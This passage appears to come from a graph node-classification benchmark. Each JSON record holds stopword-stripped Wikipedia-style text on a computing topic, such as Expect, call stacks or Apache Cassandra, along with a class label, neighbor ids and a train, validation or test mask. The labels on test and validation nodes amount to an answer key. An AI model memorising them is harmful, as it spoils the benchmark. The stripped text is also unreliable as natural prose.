anonymous subclass codice_7 n't write anything macro using silence prints within clojure created ground embrace host platforms one design goals thus provides excellent language interoperability java 10 threads manipulating one shared data structure consists 100 vectors one containing 10 initially sequential unique numbers thread repeatedly selects two random positions two random vectors swaps changes vectors occur transactions making use clojure software transactional memory system",
    "neighbors": [
      10752,
      11269,
      2056,
      7176,
      6154,
      9224,
      2062,
      9231,
      6160,
      2577,
      6161,
      7184,
      2069,
      9749,
      8728,
      4633,
      4122,
      9245,
      8226,
      5677,
      11310,
      3119,
      1591,
      2105,
      572,
      3132,
      6717,
      8258,
      8771,
      10819,
      7750,
      8262,
      1613,
      9299,
      10841,
      3675,
      8289,
      2658,
      7267,
      2660,
      8293,
      10854,
      4200,
      2666,
      5238,
      5751,
      3705,
      8825,
      7805,
      3712,
      9345,
      1159,
      5255,
      1673,
      9865,
      9875,
      9877,
      8854,
      5783,
      1698,
      5803,
      2225,
      1203,
      7347,
      6840,
      9914,
      7867,
      4799,
      7871,
      5830,
      7880,
      6860,
      205,
      5837,
      8908,
      7386,
      5852,
      10463,
      7392,
      7904,
      1250,
      10465,
      11488,
      8421,
      11495,
      2795,
      4846,
      8430,
      5360,
      5361,
      5872,
      8435,
      9969,
      10991,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      4358,
      3336,
      6919,
      1802,
      10510,
      5395,
      1301,
      1813,
      791,
      6933,
      10012,
      3869,
      5917,
      2335,
      8479,
      2849,
      10526,
      3876,
      7981,
      7983,
      2352,
      8495,
      9011,
      10547,
      823,
      311,
      4920,
      6969,
      10555,
      7485,
      3408,
      3920,
      6994,
      339,
      1363,
      1365,
      10581,
      2392,
      9560,
      9561,
      10584,
      11098,
      349,
      4960,
      5987,
      10083,
      1382,
      6502,
      11625,
      8554,
      10097,
      3446,
      9078,
      10104,
      377,
      8057,
      3966,
      4992,
      8068,
      11141,
      3462,
      10630,
      6536,
      7562,
      910,
      1435,
      6556,
      6047,
      1952,
      4516,
      1448,
      5033,
      9128,
      6067,
      438,
      6074,
      10683,
      10684,
      1470,
      3519,
      5567,
      5569,
      6594,
      963,
      7616,
      9665,
      4550,
      10690,
      10193,
      11218,
      11219,
      4056,
      4057,
      3034,
      10712,
      482,
      4069,
      3560,
      3561,
      3562,
      3051,
      5611,
      5101,
      7146,
      7662,
      4592,
      9195,
      7670,
      11255,
      10744,
      2557,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 5032,
    "label": 9,
    "text": "Expect:expect expect extension tcl scripting language written libes program automates interactions programs expose text terminal interface expect originally written 1990 unix platform since become available microsoft windows systems expect used automate control interactive applications telnet ftp passwd fsck rlogin tip ssh others expect uses pseudo terminals unix emulates console windows starts target program communicates human would via terminal console interface tk another tcl extension used provide gui expect serves glue link existing utilities together general idea figure make expect use system existing tools rather figure solve problem inside expect key usage expect involves commercial software products many products provide type command-line interface usually lack power needed write scripts built service users administering product company often spend resources fully implement robust scripting language expect script spawn shell look environmental variables perform unix commands retrieve information enter product command-line interface armed necessary information achieve user goal retrieving information interacting product via command-line interface script make intelligent decisions action take every time expect operation completed results stored local variable called expect_out allows script harvest information feedback user also allows conditional behavior send next based circumstances common use expect set testing suite whether programs utilities embedded systems dejagnu testing suite written using expect use testing used extensively testing gcc well suited testing remote targets embedded development one automate generation expect script using tool called 'autoexpect tool observes actions generates expect script using heuristics though generated code may large somewhat cryptic one always tweak generated script get exact code spawn telnet remote_server expect username send my_user_id\\r expect password send my_password\\r expect send my_command\\r expect set results expect_out buffer send exit\\r expect eof another example script automates ftp set timeout -1 spawn ftp remote_server expect username send my_user_id\\r expect password send my_password\\r expect ftp send bin\\r expect ftp send prompt\\r expect ftp send mget *\\r expect ftp send bye\\r expect eof example automates sftp password proc connect passw set user lindex argv 0 set passw lindex argv 1 set host lindex argv 2 set location lindex argv 3 set file1 lindex argv 4 set file2 lindex argv 5 user == || passw == || host == || location == || file1 == || file2 == spawn sftp user host set rez connect passw rez == 0 puts \\nerror connecting server host user user password passw \\n exit 1 using passwords command-line arguments like example huge security hole user machine read password running ps however add code prompt password rather giving password argument secure see example stty -echo send_user -- enter password expect_user -re \\n send_user \\n stty echo set pass expect_out 1 string another example automated ssh login user machine set timeout 60 spawn ssh user machine 1 wait close spawn_id various projects implement expect-like functionality languages c java scala groovy perl python ruby shell go generally exact clones original expect concepts tend similar",
    "neighbors": [
      2786,
      7364,
      10341,
      8582,
      11112,
      8554,
      10732,
      6797,
      7343,
      4528,
      7983,
      5106,
      692,
      5492,
      9780,
      8504,
      9245
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5033,
    "label": 9,
    "text": "MLisp:mlisp mlisp variant lisp algol-like syntax based m-expressions function syntax original description lisp john mccarthy mccarthy m-expressions never implemented mlisp first implemented ibm 360 horace enea reimplemented pdp 10 david canfield smith second implementation also supported special kind lambdas fexpr evaluate arguments lisp-1 scheme single namespace variables functions mlisp preprocessor alternative reader-friendly syntax lisp descendant mlisp 2 introduced new concepts mlisp2 called transitional language authors larry tesler improved pattern matching system implement successor language called lisp70 completed preliminary version though path lisp evolution widely neglected resembles features later found ml scheme m-lisp second branch—independent mlisp approach— described author essentially hybrid m-expression lisp scheme multiple third-party implementations infix-notation lisps lisp-like lisp-derived languages notable examples include",
    "neighbors": [
      512,
      4992,
      10752,
      11269,
      3334,
      6919,
      2056,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      8474,
      6556,
      3869,
      10012,
      2335,
      6047,
      1953,
      8226,
      4516,
      5031,
      9128,
      5803,
      2352,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      7386,
      11226,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 5034,
    "label": 1,
    "text": "Data_store:data store data store repository persistently storing managing collections data include repositories like databases also simpler store types simple files emails etc database series bytes managed database management system dbms file series bytes managed file system thus database file series bytes stored called data store matlab cloud storage systems like vmware firefox os use datastore term abstracting collections data inside respective applications data store refer broad class storage systems including",
    "neighbors": [
      3906,
      9762,
      9286,
      7175,
      7816,
      6153,
      4490,
      1196,
      6156,
      19,
      7347,
      2901,
      9397,
      5047,
      7288,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 5035,
    "label": 3,
    "text": "Test_register:test register test register intel 80386 intel 80486 processor register used processor usually self-test registers undocumented used specialized software test registers named tr3 tr7 regular programs n't usually require registers work pentium test registers replaced variety model-specific registers msrs two test registers tr6 tr7 provided purpose testing tr6 test command register tr7 test data register registers accessed variants mov instruction test register may either source operand destination operand mov instructions defined real-address mode protected mode test registers privileged resources protected mode mov instructions access executed privilege level 0 attempt read write test registers executing privilege level causes general protection exception also instructions generate invalid opcode exception cpu newer 80486",
    "neighbors": [
      5080,
      499,
      8851,
      1247
    ],
    "mask": "None"
  },
  {
    "node_id": 5036,
    "label": 2,
    "text": "LUnix:lunix lunix short little unix unix-like multi-tasking operating system designed run natively commodore 64 commodore 128 home computer systems supports tcp/ip networking slip ppp using rs232 interface unlike unix-like systems lunix written 6502 assembly language instead c. first version lunix released 1993 current version 0.21 dates 2004 amongst others supports preemptive multitasking unix pipes variety protocols like tcp/ip slip ppp rs232 dynamic memory management virtual consoles contains web server clients telnet pop3 ftp act terminal terminal server rs232 lunix developed daniel dallmann contributed ilker ficicilar stefan haubenthal paul gardner-stephen late 1990s first generation lunix support faster rs232 via clever software tricks 80 column vic vdc screen support ps/2 keyboard support small set standard unix commands possible first distribution attach two keyboards two monitors one rs232 terminal set three simultaneous multitasking sessions c128 lunix also supports 2 mhz mode boot disk convenience c128 platform lunix came extensive documentation time well-defined library calls relocatable code support decent memory management functions made possible develop software lunix easily",
    "neighbors": [
      6787,
      10891,
      6412,
      7188,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      8499,
      9141,
      823,
      9784,
      9151,
      7364,
      10436,
      477,
      225,
      6369,
      11112,
      8432,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5037,
    "label": 9,
    "text": "Sound_Object_(SndObj)_Library:sound object sndobj library sound object sndobj library c++ object-oriented programming library music audio development composed 100+ classes signal processing audio midi file i/o available cross-platform linux windows mac os x irix unix-like systems library development cooperative project hosted sourceforge new versions released twice-yearly development versions available via concurrent versions system cvs library also provides bindings python aka pysndobj java common lisp cffi",
    "neighbors": [
      1668,
      7172,
      6797,
      2062,
      7571,
      5397,
      6933,
      6810,
      5677,
      823,
      3665,
      10321,
      7769,
      9565,
      7550,
      8554,
      7535,
      2804,
      8958
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5038,
    "label": 7,
    "text": "Widen_(company):widen company widen software company founded 1948 plate-engraving business developed digital print company eventually software company company founded 1948 eponymous emily arthur widen private plate engraving business focused newspaper presses 1985 company began focusing color printing scanning mid-1990s widen began investing digital printing services well software services internet developing image database system saas digital asset management company company changed name widen colourgraphics ltd. widen enterprises 1997 company headquartered monona wisconsin ranked comparably one top smes united states terms management widen ’ ceo matthew gonnering though company renamed position chief eudaimonia officer reflect philosophy management style appointed 2009 transitioned company largely prepress printing company software firm widen software focuses digital asset management houses corporate information helps develop digital projects like websites advertising cataloguing example widen ’ cloud software hosts corporate information companies like brooks running shoes widen provides services public services private companies",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5039,
    "label": 9,
    "text": "Mordechai_Ben-Ari:mordechai ben-ari mordechai moti ben-ari professor computer science education weizmann institute science ben-ari published numerous textbooks computer science developed software tools teaching computer science written many influential papers computer science education primary focus books tools learning theoretical concepts computer science concurrency mathematical logic collaboration university joensuu finland group developed jeliot program animation system teaching elementary computer science programming ben-ari received 2004 acm sigcse award outstanding contributions computer science education named acm distinguished educator 2009",
    "neighbors": [
      9224,
      3529,
      428
    ],
    "mask": "None"
  },
  {
    "node_id": 5040,
    "label": 2,
    "text": "Call_stack:call stack computer science call stack stack data structure stores information active subroutines computer program kind stack also known execution stack program stack control stack run-time stack machine stack often shortened stack although maintenance call stack important proper functioning software details normally hidden automatic high-level programming languages many computer instruction sets provide special instructions manipulating stacks call stack used several related purposes main reason one keep track point active subroutine return control finishes executing active subroutine one called yet complete execution control handed back point call activations subroutines may nested level recursive special case hence stack structure example subroutine codice_1 calls subroutine codice_2 four different places codice_2 must know return execution completes accomplish address following instruction jumps codice_2 return address pushed onto call stack call since call stack organized stack caller pushes return address onto stack called subroutine finishes pulls pops return address call stack transfers control address called subroutine calls yet another subroutine push another return address onto call stack information stacking unstacking program dictates pushing consumes space allocated call stack error called stack overflow occurs generally causing program crash adding subroutine entry call stack sometimes called winding conversely removing entries unwinding usually exactly one call stack associated running program accurately task thread process although additional stacks may created signal handling cooperative multitasking setcontext since one important context referred stack implicitly task however forth programming language data stack parameter stack accessed explicitly call stack commonly referred stack see high-level programming languages specifics call stack usually hidden programmer given access set functions memory stack example abstraction assembly languages hand require programmers involved manipulating stack actual details stack programming language depend upon compiler operating system available instruction set noted primary purpose call stack store return addresses subroutine called location address instruction calling routine later resume needs saved somewhere using stack save return address important advantages alternative calling conventions one task stack thus subroutine thread-safe active simultaneously different tasks different things another benefit providing reentrancy recursion automatically supported function calls recursively return address needs stored activation function later used return function activation stack structures provide capability automatically depending language operating-system machine environment call stack may serve additional purposes including example typical call stack used return address locals parameters known call frame environments may fewer functions assigned call stack forth programming language example ordinarily return address counted loop parameters indexes possibly local variables stored call stack environment named return stack although data temporarily placed using special return-stack handling code long needs calls returns respected parameters ordinarily stored separate data stack parameter stack typically called stack forth terminology even though call stack since usually accessed explicitly forths also third stack floating-point parameters call stack composed stack frames also called activation records activation frames machine dependent abi-dependent data structures containing subroutine state information stack frame corresponds call subroutine yet terminated return example subroutine named codice_2 currently running called subroutine codice_1 top part call stack might laid like adjacent picture diagram like drawn either direction long placement top direction stack growth understood furthermore independently architectures differ whether call stacks grow towards higher addresses towards lower addresses logic diagram independent addressing choice stack frame top stack currently executing routine stack frame usually includes least following items push order stack frame sizes differ different functions invocations particular function popping frame stack constitute fixed decrement stack pointer function return stack pointer instead restored frame pointer value stack pointer function called stack frame contains stack pointer top frame immediately stack pointer mutable register shared invocations frame pointer given invocation function copy stack pointer function invoked locations fields frame defined relative either top frame negative offsets stack pointer relative top frame positive offsets frame pointer location frame pointer must inherently defined negative offset stack pointer systems stack frame field contain previous value frame pointer register value caller executing example stack frame codice_2 would memory location holding frame pointer value codice_1 uses shown diagram value saved upon entry subroutine restored upon return field known location stack frame enables code access frame successively underneath currently executing routine frame also allows routine easily restore frame pointer caller frame returns programming languages support nested subroutines also field call frame points stack frame latest activation procedure closely encapsulates callee i.e immediate scope callee called access link static link keeps track static nesting dynamic recursive calls provides routine well routines may invoke access local data encapsulating routines every nesting level architectures compilers optimization cases store one link enclosing level immediately enclosing deeply nested routines access shallow data traverse several links strategy often called display access links optimized away inner function access non-constant local data encapsulation case pure functions communicating via arguments return values example historical computers burroughs large systems special display registers support nested functions compilers modern machines ubiquitous x86 simply reserve words stack pointers needed purposes stack frame subroutine caller considered overlap overlap consisting area parameters passed caller callee environments caller pushes argument onto stack thus extending stack frame invokes callee environments caller preallocated area top stack frame hold arguments supplies subroutines calls area sometimes termed outgoing arguments area callout area approach size area calculated compiler largest needed called subroutine usually call stack manipulation needed site call subroutine minimal good since many call sites subroutine called values actual arguments evaluated call site since specific particular call either pushed onto stack placed registers determined used calling convention actual call instruction branch link typically executed transfer control code target subroutine called subroutine first code executed usually termed subroutine prologue since necessary housekeeping code statements routine begun instruction set architectures instruction used call subroutine puts return address register rather pushing onto stack prologue commonly save return address pushing value onto call stack although called subroutine call routines may leave value register similarly current stack pointer and/or frame pointer values may pushed frame pointers used prologue typically set new value frame pointer register stack pointer space stack local variables allocated incrementally changing stack pointer forth programming language allows explicit winding call stack called return stack subroutine ready return executes epilogue undoes steps prologue typically restore saved register values frame pointer value stack frame pop entire stack frame stack changing stack pointer value finally branch instruction return address many calling conventions items popped stack epilogue include original argument values case usually stack manipulations need done caller calling conventions however caller responsibility remove arguments stack return returning called function pop top frame stack perhaps leaving return value general act popping one frames stack resume execution elsewhere program called stack unwinding must performed non-local control structures used used exception handling case stack frame function contains one entries specifying exception handlers exception thrown stack unwound handler found prepared handle catch type thrown exception languages control structures require general unwinding pascal allows global goto statement transfer control nested function previously invoked outer function operation requires stack unwound removing many stack frames necessary restore proper context transfer control target statement within enclosing outer function similarly c codice_11 codice_12 functions act non-local gotos common lisp allows control happens stack unwound using codice_13 special operator applying continuation stack logically unwound rewound stack continuation way implement continuations example using multiple explicit stacks application continuation simply activate stack wind value passed scheme programming language allows arbitrary thunks executed specified points unwinding rewinding control stack continuation invoked call stack sometimes inspected program running depending program written compiled information stack used determine intermediate values function call traces used generate fine-grained automated tests cases like ruby smalltalk implement first-class continuations example gnu debugger gdb implements interactive inspection call stack running paused c program taking regular-time samples call stack useful profiling performance programs subroutine pointer appears call stack sampling data many times likely code bottleneck inspected performance problems language free pointers non-checked array writes c mixing control flow data affects execution code return addresses saved frame pointers simple program data parameters return values call stack security risk possibly exploitable stack buffer overflows common type buffer overflows one attacks involves filling one buffer arbitrary executable code overflowing buffer overwrite return address value points directly executable code result function returns computer executes code kind attack easily blocked w^x similar attacks succeed even w^x protection enabled including return-to-libc attack attacks coming return-oriented programming various mitigations proposed storing arrays completely separate location return stack case forth programming language",
    "neighbors": [
      6664,
      9224,
      9739,
      2062,
      3603,
      8231,
      3630,
      5176,
      2105,
      2620,
      2115,
      2627,
      8262,
      585,
      1103,
      7760,
      6742,
      602,
      10333,
      6754,
      8301,
      9330,
      9331,
      9854,
      642,
      10883,
      136,
      655,
      10395,
      1702,
      9896,
      7858,
      692,
      9911,
      11447,
      1724,
      7870,
      9921,
      2253,
      2255,
      7889,
      6868,
      727,
      7896,
      7386,
      1247,
      6373,
      5862,
      5358,
      1775,
      5872,
      11506,
      2804,
      3321,
      2811,
      7421,
      2817,
      8966,
      6411,
      9996,
      4877,
      10510,
      4884,
      7445,
      5911,
      1820,
      10012,
      4385,
      7983,
      2878,
      3904,
      4423,
      4424,
      6988,
      8524,
      10584,
      9563,
      8545,
      11106,
      10083,
      8037,
      4968,
      372,
      1399,
      10104,
      1915,
      11644,
      898,
      1922,
      3462,
      8587,
      3473,
      2975,
      1952,
      7071,
      1444,
      1445,
      427,
      428,
      9646,
      435,
      1459,
      4534,
      10176,
      1474,
      5059,
      6596,
      9668,
      3529,
      5065,
      4562,
      2012,
      477,
      1502,
      7135,
      4582,
      4592,
      499,
      6652,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5041,
    "label": 2,
    "text": "Bare_machine:bare machine computer science bare machine bare metal refers computer executing instructions directly logic hardware without intervening operating system modern operating systems evolved various stages elementary present day complex highly sensitive systems incorporating many services development programmable computers require physical changes run different programs prior development operating systems sequential instructions executed computer hardware directly using machine language without system software layer approach termed bare machine precursor modern operating systems today mostly applicable embedded systems firmware generally time-critical latency requirements conventional programs run runtime system overlaid operating system pdp-11 machine allowed programmers load program supplied machine code ram resulting operation program could monitored lights output derived mag tape print devices storage bare machine programming remains common practice embedded systems microcontrollers microprocessors often boot directly monolithic single-purpose software without loading separate operating system embedded software vary structure simplest form may consist infinite main loop calling subroutines responsible checking inputs performing actions writing outputs",
    "neighbors": [
      7905,
      7983,
      7217,
      11601,
      7507,
      5363,
      3413,
      10803,
      8509,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 5042,
    "label": 3,
    "text": "Gamebike:gamebike game bike interactive fitness bike requires user exercise order play video games user must pedal bike order character accelerate must turn handlebars steer game bike allows users control character game getting exercise game bike name interactive fitness device first invented patented edward h. ted parks m.d 2000 dr parks sold rights patent cateye co ltd japanese company expertise electronic bicycle accessories bike lights speedometers cateye initial embodiment parks design used traditional bicycle attached referred gb100 system front tire placed turn style platform used read direction sensors placed rear wheel mounted bicycle trainer measure speed cateye co ltd. first started production game bike gb100 form project handled group new jersey redesigned product single package incorporated stand-alone indoor exercise bike gb200 born immediate need commercial version soon covered introduction popular gb-300 game bike late 2008 cateye co ltd. stopped international distribution fitness line game bike production done source distributors inc. dallas texas source distributors produced bike made modifications unit improve controller serviceability game bike popular product within school ymca markets thousands bikes sold since start 2003 game bike owned hudson fitness llc game bike currently available hudson fitness llc continues supporting game bike service compatible titles include speed-based video game ps2/ps3/game cube/xbox",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5043,
    "label": 2,
    "text": "MK-DOS:mk-dos mk-dos one widespread operating systems elektronika bk personal computers developed mikhail korolev dmitriy butyrskiy 1in like andos system provided full compatibility models emulating bk-0010 environments modern bk-0011 bk-0011m machines program requests magnetic tape made proper rom functions redirected disk system supported 4 physical disk drives actual number limited disk rom installed many hard disk partitions number letters latin alphabet could used separate logical drives volume 32 mb see also drive letter assignment starting version 3.0 system also supported mounting disk images logical drives booted bk-0011 bk-0011m system automatically created ram disk computer memory widespread file system along mk-dos users microdos support file fragmentation like file system used rt-11 required frequent spatial reallocation maintain optimum contiguous free space rt-11 users would use 'squeeze command worked way *compact command acorn dfs bbc micro although mk-dos incompatible rt-11 file system shared many principles microdos file system read-only support andos filename length limited 14 symbols filename extension recognized separately considered part filename minimal installation system took little 8 kb computer memory functional norton commander-like file manager called mcommander also shipped number utilities including drivers rt-11 fat12 csi-dos file systems add-ons file manager",
    "neighbors": [
      9762,
      2179,
      1253,
      7983,
      3512,
      11033,
      1853,
      7358
    ],
    "mask": "Test"
  },
  {
    "node_id": 5044,
    "label": 2,
    "text": "STXIT:stxit stxit macro instruction dos/360 operating system ibm system/360 series mainframe computers successors later mainframe series also available univac series 90 mainframes running tos/dos operating system later vs/9 operating system macro abbreviation term set exit used programs written assembly language used create recovery routine event program errors similar signal handlers c try/finally blocks c++ java object oriented languages stxit macro would provide error recovery address several major types errors certain operator signals errors covered depended upon operating system general errors provided recovery included timer interrupt stxit provided mechanism sampling program execution used various legacy performance analyzers essentially psw gathered time interval used later analysis determine hot spots program check stxit provided mechanism program animation via deliberate introduction invalid opcodes fly locations target programs exit recovery entered original opcode would restored ready later resumption new location set format macro call depended upon system used upon dos/vse one two forms either macro call establish create stxit routine handle appropriate event macro call de-establish longer handle event establish stxit routine would code stxit routine completes returns point invoked via exit macro return appropriate point called unless ab routine case permitted return must issue termination macro eoj cancel detach dump de-establish cancel stxit routine would code cancel routine event everything beginning one space parameter comment z/system vse stxit functions provided previously ibm dos/vse still supported addition new stxit macro function 'disabled timer appendage die available use supervisor mode key 0 psw privilege bit =1 format die means routine handle disabled interval timer event rtnaddr address handle expiration interval timer set tod event coded address may instead specified 1 meaning address stored register 1 routine subject strict restrictions including changing register contents using svcs univac vs/9 stxit macro vs/9 parameter based missing entries entered commas e.g third item handled format would remove one handlers stxit macro re-invoked blank entry handlers removed one stxit macro call effect time class event handled omitted would two commas row indicate unhandled class event causes error handled operating system default handler events representing critical errors abend progcheck program terminated eo79 error user option request pdump non-critical events event ignored later error recovery systems would provide specifying errors explicitly opposed position parameter stxit macro univac vs/9 continued support stxit also added crtn contingency routine macro provide even powerful error recovery well recovery errors stxit capture originally crtn stxit could used together later releases operating system provided crtn stxit macro used crtn handled events covered stxit used cover event stxit routine handled event crtn routine invoked",
    "neighbors": [
      1219,
      1253,
      7274,
      10508,
      5677,
      7983,
      5457,
      10235,
      477
    ],
    "mask": "Train"
  },
  {
    "node_id": 5045,
    "label": 4,
    "text": "Mausezahn:mausezahn typical applications mausezahn include mausezahn allows sending arbitrary sequence bytes directly network interface card integrated packet builder provides simple command line interface complicated packets since version 0.38 mausezahn offers multi-threaded mode cisco-style command line interface version 0.38 mausezahn supports following features mausezahn sends exactly packet user specified therefore rather less suited vulnerability audits additional algorithms required detect open ports behind firewall automatically evade intrusion detection systems ids however network administrator could implement audit routines via script utilizes mausezahn creating actual packets mausezahn currently runs linux systems plans port windows operating system",
    "neighbors": [
      6273,
      138,
      4373,
      11413,
      5402,
      9381,
      1580,
      10924,
      7983,
      2739,
      9780,
      823,
      11321,
      5437,
      2887,
      7901,
      11486,
      5472,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5046,
    "label": 2,
    "text": "AOS/VS_II:aos/vs ii aos/vs ii discontinued operating system data general 32-bit mv/eclipse computers aos/vs ii operating system released 1988 originally simply rev 8.00 aos/vs operating system however introduced new file system compatible original aos aos/vs file system also contained new features like access control list acl groups since customers want upgrade new file system invest new hardware data general agreed continue bug-fix support “ immortal ” revision aos/vs became known colloquially aos/vs “ classic ” new development would proceed aos/vs ii revision numbers rolled back 1.00 vs-classic rev 7.7x vs-ii rev 3.2x updated survive year 2000 problem although time obsolescent among new features part aos/vs ii full tcp/ip stack nfs support expanded kernel address space using ring-1 logical disk-level user data cache /vs classic file system metadata cache user data cache",
    "neighbors": [
      96,
      9762,
      8902,
      7983,
      1971,
      8502
    ],
    "mask": "Test"
  },
  {
    "node_id": 5047,
    "label": 1,
    "text": "Apache_Cassandra:apache cassandra apache cassandra free open-source distributed wide column store nosql database management system designed handle large amounts data across many commodity servers providing high availability single point failure cassandra offers robust support clusters spanning multiple datacenters asynchronous masterless replication allowing low latency operations clients avinash lakshman one authors amazon dynamo prashant malik initially developed cassandra facebook power facebook inbox search feature facebook released cassandra open-source project google code july 2008 march 2009 became apache incubator project february 17 2010 graduated top-level project facebook developers named database trojan mythological prophet cassandra classical allusions curse oracle releases graduation include cassandra introduced cassandra query language cql cql simple interface accessing cassandra alternative traditional structured query language sql cql adds abstraction layer hides implementation details structure provides native syntaxes collections common encodings language drivers available java jdbc python dbapi2 node.js helenus go gocql c++ example keyspace creation including column family cql 3.0 gives cassandra 1.0 cassandra row level consistent meaning inserts updates table affect row processed approximately time may affect non-key columns inconsistent ways one update may affect one column another affects resulting sets values within row never specified intended cassandra 1.1 solved issue introducing row-level isolation tombstones known cause performance degradation severe consequence levels cassandra wide column store essentially hybrid key-value tabular database management system data model partitioned row store tunable consistency rows organized tables first component table primary key partition key within partition rows clustered remaining columns key columns may indexed separately primary key tables may created dropped altered run-time without blocking updates queries cassandra joins subqueries rather cassandra emphasizes denormalization features like collections column family called table since cql 3 resembles table rdbms relational database management system column families contain rows columns row uniquely identified row key row multiple columns name value timestamp unlike table rdbms different rows column family share set columns column may added one multiple rows time key cassandra corresponds value object key values columns columns grouped together sets called column families thus key identifies row variable number elements column families could considered tables table cassandra distributed multi dimensional map indexed key furthermore applications specify sort order columns within super column simple column family cassandra java-based system managed monitored via java management extensions jmx jmx-compliant nodetool utility instance used manage cassandra cluster adding nodes ring draining nodes decommissioning nodes nodetool also offers number commands return cassandra metrics pertaining disk usage latency compaction garbage collection since cassandra 2.0.2 2013 measures several metrics produced via dropwizard metrics framework may queried via jmx using tools jconsole passed external monitoring systems via dropwizard-compatible reporter plugins according db-engines ranking cassandra popular wide column store september 2014 became 9th popular database",
    "neighbors": [
      3,
      6161,
      1047,
      1049,
      8217,
      11303,
      5677,
      9789,
      7742,
      7233,
      9285,
      7750,
      11343,
      2130,
      7261,
      8799,
      8294,
      8295,
      8810,
      2163,
      6774,
      7816,
      10377,
      8860,
      1701,
      10413,
      2234,
      7359,
      6338,
      1222,
      4294,
      6860,
      6359,
      8408,
      8425,
      747,
      3819,
      11017,
      8460,
      11535,
      1296,
      1306,
      6943,
      3877,
      9518,
      1327,
      7983,
      7475,
      4919,
      1851,
      7485,
      3906,
      4419,
      10565,
      7499,
      4944,
      6993,
      1363,
      2901,
      3927,
      11098,
      865,
      11111,
      2413,
      1913,
      10111,
      11136,
      7042,
      7567,
      11161,
      6555,
      9631,
      10661,
      5034,
      6067,
      4538,
      6074,
      1991,
      5066,
      8139,
      9179,
      990,
      10719,
      11235,
      7147,
      5612,
      10737,
      8691,
      7159,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 5048,
    "label": 9,
    "text": "Adobe_ColdFusion:adobe coldfusion adobe coldfusion commercial rapid web-application development platform created j. j. allaire 1995 programming language used platform also commonly called coldfusion though accurately known cfml coldfusion originally designed make easier connect simple html pages database version 2 1996 became full platform included ide addition full scripting language one distinguishing features coldfusion associated scripting language coldfusion markup language cfml cfml compares scripting components asp jsp php purpose features tag syntax closely resembles html script syntax resembles javascript coldfusion often used synonymously cfml additional cfml application servers besides coldfusion coldfusion supports programming languages cfml server-side actionscript embedded scripts written javascript-like language known cfscript originally product allaire released july 2 1995 coldfusion developed brothers joseph j. allaire jeremy allaire 2001 allaire acquired macromedia turn acquired adobe systems inc 2005 coldfusion often used data-driven websites intranets also used generate remote services rest services websockets soap web services flash remoting especially well-suited server-side technology client-side ajax coldfusion also handle asynchronous events sms instant messaging via gateway interface available coldfusion mx 7 enterprise edition coldfusion provides number additional features box main features include implementations cfml offer similar enhanced functionality running .net environment image manipulation engine written c featured among things built-in scripting language cfscript plugin modules written java syntax similar html equivalent html element coldfusion tag begins letters cf followed name indicative tag interpreted html e.g cfoutput begin output variables content addition cfscript plugins described cfstudio provided design platform wysiwyg display addition coldfusion cfstudio also supports syntax languages popular backend programming perl addition making backend functionality easily available non-programmer version 4.0 forward particular integrated easily apache web server internet information services versions coldfusion prior 6.0 written using microsoft visual c++ meant coldfusion largely limited running microsoft windows although allaire successfully port coldfusion sun solaris starting version 3.1 allaire company sold macromedia macromedia sold adobe earlier versions robust versions available version 4.0 forward release coldfusion mx 6.0 engine re-written java supported runtime environment easily replaced configuration options runtime environment sun version 6.1 included ability code debug shockwave flash version 3.1 brought port sun solaris operating system cold fusion studio gained live page preview html syntax checker cold fusion moniker renamed simply coldfusion possibly distinguish cold fusion theory version 4.5 brought ability natively invoke java objects execute system commands talk directly java ee server first release macromedia allaire corporation acquisition last legacy coded specific platform january 16 2001 allaire announced pending merger macromedia macromedia continued development released product name coldfusion 5.0 retained name coldfusion remainder version 5 releases prior 2000 edwin smith allaire architect jrun later flash player initiated project codenamed neo project later revealed coldfusion server re-written completely using java made portability easier provided layer security server ran inside java runtime environment june 2002 macromedia released version 6.0 product slightly different name coldfusion mx allowing product associated macromedia brand original branding coldfusion mx completely rebuilt ground based java ee platform coldfusion mx also designed integrate well macromedia flash using flash remoting release coldfusion mx cfml language api released oop interface release coldfusion 7.0 february 7 2005 naming convention amended rendering product name macromedia coldfusion mx 7 codename cfmx7 blackstone cfmx 7 added flash-based xforms-based web forms report builder output adobe pdf well flashpaper rtf excel adobe pdf output also available wrapper html page converting page quality printable document enterprise edition also added gateways provide interaction non-http request services im services sms directory watchers asynchronous execution xml support boosted version include native schema checking coldfusion mx 7.0.1 codename merrimack added support mac os x improvements flash forms rtf support cfreport new cfcproxy feature java/cfc integration coldfusion mx 7.0.2 codenamed mystic included advanced features working adobe flex 2 well improvements cf report builder july 30 2007 adobe systems released coldfusion 8 dropping mx name beta testing codename used scorpio eighth sign zodiac eighth iteration coldfusion commercial product 14,000 developers worldwide active beta process many testers 5,000 adobe systems originally expected coldfusion development team consisted developers based newton/boston massachusetts offshore bangalore india new features cfpdfform tag enables integration adobe acrobat forms image manipulation functions microsoft .net integration cfpresentation tag allows creation dynamic presentations using adobe acrobat connect web-based collaboration solution formerly known macromedia breeze addition coldfusion administrator enterprise version ships built-in server monitoring coldfusion 8 available several operating systems including linux mac os x windows server 2003 additions coldfusion 8 built-in ajax widgets file archive manipulation cfzip microsoft exchange server integration cfexchange image manipulation including automatic captcha generation cfimage multi-threading per-application settings atom rss feeds reporting enhancements stronger encryption libraries array structure improvements improved database interaction extensive performance improvements pdf manipulation merging capabilities cfpdf interactive debugging embedded database support apache derby ecmascript compliant cfscript development 